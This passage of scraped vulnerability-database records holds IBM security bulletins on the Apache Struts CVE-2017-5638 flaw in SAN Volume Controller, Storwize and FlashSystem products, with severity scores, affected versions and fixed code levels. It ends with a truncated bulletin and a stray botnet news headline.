["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T17:45:58", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart pa

Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws

Description

Related